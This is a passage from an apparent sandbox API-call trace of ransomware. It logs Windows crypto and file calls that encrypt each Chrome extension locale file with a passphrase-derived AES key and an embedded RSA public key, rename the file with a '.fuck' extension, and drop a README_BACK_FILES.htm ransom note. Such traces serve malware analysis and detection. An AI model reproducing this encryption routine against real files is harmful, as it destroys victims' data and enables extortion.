(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0255.151] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0255.153] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0255.154] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.154] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.154] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.154] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.154] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.154] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0255.154] AreFileApisANSI () returned 1 [0255.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.155] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.155] GetFileType (hFile=0x5d50) returned 0x1 [0255.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.157] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.157] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.157] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.158] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.158] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.158] GetLastError () returned 0x0 [0255.158] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json")) returned 0x20 [0255.158] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json", dwFileAttributes=0x80) returned 1 [0255.159] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.159] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.161] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.161] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.163] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.163] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.163] CryptHashData (hHash=0x2e18828, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.163] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.163] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.164] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.164] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10710) returned 1 [0255.164] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10710, dwCertEncodingType=0x1, pInfo=0x2991320*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991350*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991358*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18c28) returned 1 [0255.164] CryptEncrypt (in: hKey=0x2e18c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.164] CryptEncrypt (in: hKey=0x2e18c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10ac8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10ac8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.164] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e10ac8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10ac8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.165] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x1c2, lpOverlapped=0x0) returned 1 [0255.167] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x1c2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x1d0) returned 1 [0255.167] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1d0, lpOverlapped=0x0) returned 1 [0255.167] CloseHandle (hObject=0x5d5c) returned 1 [0255.167] CloseHandle (hObject=0x5d60) returned 1 [0255.167] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), bFailIfExists=0) returned 1 [0255.171] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json", dwFileAttributes=0x0) returned 1 [0255.172] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.gsg")) returned 1 [0255.174] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.fuck")) returned 1 [0255.175] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.175] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.175] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.175] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.175] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.175] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\readme_back_files.htm")) returned 0xffffffff [0255.175] AreFileApisANSI () returned 1 [0255.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.176] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.176] GetFileType (hFile=0x5d50) returned 0x1 [0255.176] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.178] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.178] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.179] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.180] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.180] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.180] GetLastError () returned 0x0 [0255.180] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json")) returned 0x20 [0255.180] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0255.181] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.182] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.183] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.184] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.187] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.187] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.187] CryptHashData (hHash=0x2e18828, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.187] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.187] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.187] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.187] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e113d0) returned 1 [0255.188] CryptImportPublicKeyInfo (in: hCryptProv=0x2e113d0, dwCertEncodingType=0x1, pInfo=0x298fc60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298fc90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298fc98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18fa8) returned 1 [0255.188] CryptEncrypt (in: hKey=0x2e18fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.188] CryptEncrypt (in: hKey=0x2e18fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11b40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11b40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.188] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e11b40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11b40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.190] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0255.192] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0255.192] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0255.192] CloseHandle (hObject=0x5d60) returned 1 [0255.192] CloseHandle (hObject=0x5d5c) returned 1 [0255.192] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0255.197] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0255.197] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0255.199] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0255.202] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.202] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.202] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.202] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.202] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.202] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0255.202] AreFileApisANSI () returned 1 [0255.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.202] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.203] GetFileType (hFile=0x5d50) returned 0x1 [0255.203] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.205] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: 